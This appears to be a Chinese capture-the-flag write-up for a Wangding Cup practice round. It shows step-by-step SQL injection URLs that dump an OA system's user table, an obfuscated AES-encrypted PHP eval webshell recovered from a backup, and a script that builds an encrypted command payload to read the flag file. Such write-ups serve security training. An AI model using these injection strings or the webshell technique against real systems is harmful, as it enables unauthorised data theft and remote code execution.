WEB01
文件上传
1
http://0192c6a5ded67282a36b8e62b3ac6731.3ljw.dg07.wangdingcup.com:43005/upload.php
拿到flag
web02
1
http://0192c6b07da1728495c1bb5050f26fb6.bcyz.dg05.wangdingcup.com:43014/OA_announcement.php?id=1%20and%201%20=1
说明存在sql注入漏洞
1
http://0192c6b07da1728495c1bb5050f26fb6.bcyz.dg05.wangdingcup.com:43014/OA_announcement.php?id=1+order+by+4
获取数据库长度
1
http://0192c6c827887285a1fd1f0b67aa4d50.lnd7.dg03.wangdingcup.com:43006/OA_announcement.php?id=1%20and%20%20length(database())%3E13%20--+
1
http://0192c6c827887285a1fd1f0b67aa4d50.lnd7.dg03.wangdingcup.com:43006/OA_announcement.php?id=1%20and%20%20length(database())%3E14%20--+
知道数据库长度为 14
1
http://0192c6c827887285a1fd1f0b67aa4d50.lnd7.dg03.wangdingcup.com:43006/OA_announcement.php?id=1%20and%20%20length(database())=14%20--+
获取数据库名称
盲注获取
1
2
3
4
http://0192c6c827887285a1fd1f0b67aa4d50.lnd7.dg03.wangdingcup.com:43006/OA_announcement.php?id=1%20and%20(ascii(substr(database(),1,1))=77)%20--+
http://0192c6c827887285a1fd1f0b67aa4d50.lnd7.dg03.wangdingcup.com:43006/OA_announcement.php?id=1%20and%20(ascii(substr(database(),2,1))=111)%20--+
http://0192c6c827887285a1fd1f0b67aa4d50.lnd7.dg03.wangdingcup.com:43006/OA_announcement.php?id=1%20and%20(ascii(substr(database(),3,1))=122)%20--+
获取数据名称 Mozhe_OAsystem
联合注入
1
http://0192c6c827887285a1fd1f0b67aa4d50.lnd7.dg03.wangdingcup.com:43006/OA_announcement.php?id=-1%20union%20select%201,2,database(),4%20--+
1
2
3
4
5
6
7
http://0192c6c827887285a1fd1f0b67aa4d50.lnd7.dg03.wangdingcup.com:43006/OA_announcement.php?id=-1%20union%20select%201,group_concat(table_name),3,4%20from%20information_schema.tables%20where%20table_schema=%27Mozhe_OAsystem%27%20--+
OA_Users,cms,ua
http://0192c6c827887285a1fd1f0b67aa4d50.lnd7.dg03.wangdingcup.com:43006/OA_announcement.php?id=-1%20union%20select%201,group_concat(column_name),3,4%20from%20information_schema.columns%20where%20table_name=%27OA_Users%27%20--+
id,OAname,PassWord,Status
1
http://0192c6c827887285a1fd1f0b67aa4d50.lnd7.dg03.wangdingcup.com:43006/OA_announcement.php?id=-1%20union%20select%201,group_concat(concat_ws(%27-%27,OAname,PassWord)),3,4%20from%20OA_Users%20--+
解密用户登录获取flag
wdflag{qsbvaxnwvwakwhgec3gq8y8b0q68twae}
web03
首先从题目中可以知道,系统已经备份了,所以肯定是存在备份文件
解压出来,一大推php文件
直接将php文件名称提取出来,放到yakit批量跑,发现有输出数据的文件describedssTest.php
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
<? php error_reporting(0);
header('Content-type: text/html; charset=utf-8');
$p8 = '3b7430adaed18facca7b799229138b7b';
$a8 = 'TURNeU9UWTBOelUwTmprd05UUTVOR0ZLV1ZwdU9XSkZORmh2WnpoS1RrNW1jRTFrTkdjOVBRPT0=';
$d8 = 'TURNeU9UWTBOelUwTmprd05UUTVOR012V1c5cVJXNXBkWEJyZDFsemJsQlpNMmRITjNaYWVFVnFPVWRqVnpoWlUyNXZNbmhDU21jd2RHTkxRazF2U1hvMU9FNUNWM2RNUjFWYVJuVnBiV3czUlVwUldFMTFhakp2VjJKS1NIVlJUMU5UYjNoSWExUk5hMlZXY21OdlRuaHVRMjlsVkV4aEwzbGpQUT09';
$v8 = '0329647546905494';
function e($D, $K) {
$cipher = 'aes-128-cbc';
$encrypted = openssl_encrypt($D, $cipher, $K, 0, $GLOBALS['v8']);
$result = base64_encode($GLOBALS['v8'].$encrypted);
$result = base64_encode($result);
return $result;
}
function d($D, $K) {
$cipher = 'aes-128-cbc';
$decodedData = base64_decode(base64_decode($D));
$encryptedData = substr($decodedData, openssl_cipher_iv_length($cipher));
$decrypted = openssl_decrypt($encryptedData, $cipher, $K, 0, $GLOBALS['v8']);
return $decrypted;
}
$a8 = trim(d($a8, $p8));
ob_start();
$a8(trim(d($d8, $p8)));
$O = ob_get_contents();
ob_end_clean();
echo e($O, $p8);
?>
解密 $d8 变量的数据
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
<?php
$p8 = '3b7430adaed18facca7b799229138b7b';
$a8 = 'TURNeU9UWTBOelUwTmprd05UUTVOR0ZLV1ZwdU9XSkZORmh2WnpoS1RrNW1jRTFrTkdjOVBRPT0=';
$d8 = 'TURNeU9UWTBOelUwTmprd05UUTVOR012V1c5cVJXNXBkWEJyZDFsemJsQlpNMmRITjNaYWVFVnFPVWRqVnpoWlUyNXZNbmhDU21jd2RHTkxRazF2U1hvMU9FNUNWM2RNUjFWYVJuVnBiV3czUlVwUldFMTFhakp2VjJKS1NIVlJUMU5UYjNoSWExUk5hMlZXY21OdlRuaHVRMjlsVkV4aEwzbGpQUT09';
$v8 = '0329647546905494';
function decryptData($data, $key, $iv) {
$decodedData = base64_decode(base64_decode($data));
$encryptedData = substr($decodedData, 16); // 16 是 IV 的长度
return openssl_decrypt($encryptedData, 'aes-128-cbc', $key, 0, $iv);
}
// 解密 $a8 和 $d8
$decrypted_d8 = decryptData($d8, $p8, $v8);
echo "解密后的 d8 内容: ".$decrypted_d8 . "\n";
?>
从解密出了的字符 eval函数,@eval("if(md5(@\$_GET['id'])===\$p8){@eval(trim(d(\$_POST['d'],\$p8)));}")
$p8 = "3b7430adaed18facca7b799229138b7b" 使用了二次md5加密,但是if 判断条件只是一层md5加密
先解密 3b7430adaed18facca7b799229138b7b 获取到 20241026 ,然后在将 20241026 cmd5加密 获取 04c50eb4bc04c76311d03550ee2c1b71
在执行eval函数是,使用了d函数加密post值
1
@eval(trim(d(\$_POST['d'],\$p8)));}
构造php加密脚本,生成flag 加密数据
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
<?php
$p8 = '3b7430adaed18facca7b799229138b7b';
$v8 = '0329647546905494';
function e($D, $K) {
$cipher = 'aes-128-cbc';
$encrypted = openssl_encrypt($D, $cipher, $K, 0, $GLOBALS['v8']);
$result = base64_encode($GLOBALS['v8'].$encrypted);
$result = base64_encode($result);
return $result;
}
$codeToExecute = 'system("cat ../../../../flag.txt");';
$encryptedData = e($codeToExecute, $p8);
echo $encryptedData;
解密
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
<?php
$p8 = '3b7430adaed18facca7b799229138b7b';
$v8 = '0329647546905494';
$d8 = "
TURNeU9UWTBOelUwTmprd05UUTVORmRSYWxWTlQwUjZaR3BHZEVsd01YQkdWSGRKUkdsVFJXSlplVE13VWtGTU5IWXpZa1JHUWpOYVdVWm9iRFpwWkdFNFF5dGhORTFVVnl0U2VtaFVhVVE9
";
function decryptData($data, $key, $iv) {
$decodedData = base64_decode(base64_decode($data));
$encryptedData = substr($decodedData, 16); // 16 是 IV 的长度
return openssl_decrypt($encryptedData, 'aes-128-cbc', $key, 0, $iv);
}
// 解密 $a8 和 $d8
$decrypted_a8 = decryptData($d8, $p8, $v8);
echo "解密后的 d8 内容: " . $decrypted_a8 . "\n";
?>
MISC01
搜索password
CRYPTO01
CRYPTO02
使用010工具查看图片内容,发现在最后初存在一段base64 加密
1
d2RmbGFne2RlNjA1YTM3NDZmZGM5MTl9
解密flag
附上题目:
通过百度网盘分享的文件:第四届“网鼎杯”网络安全大赛赛前模拟训练.7z链接:https://pan.baidu.com/s/1DLMba8MDs44eHHKNQU5Gwg?pwd=pbqz
附上微信群,交流技术和划水聊天等,扫描下面二维码,添加我好友拉进群。
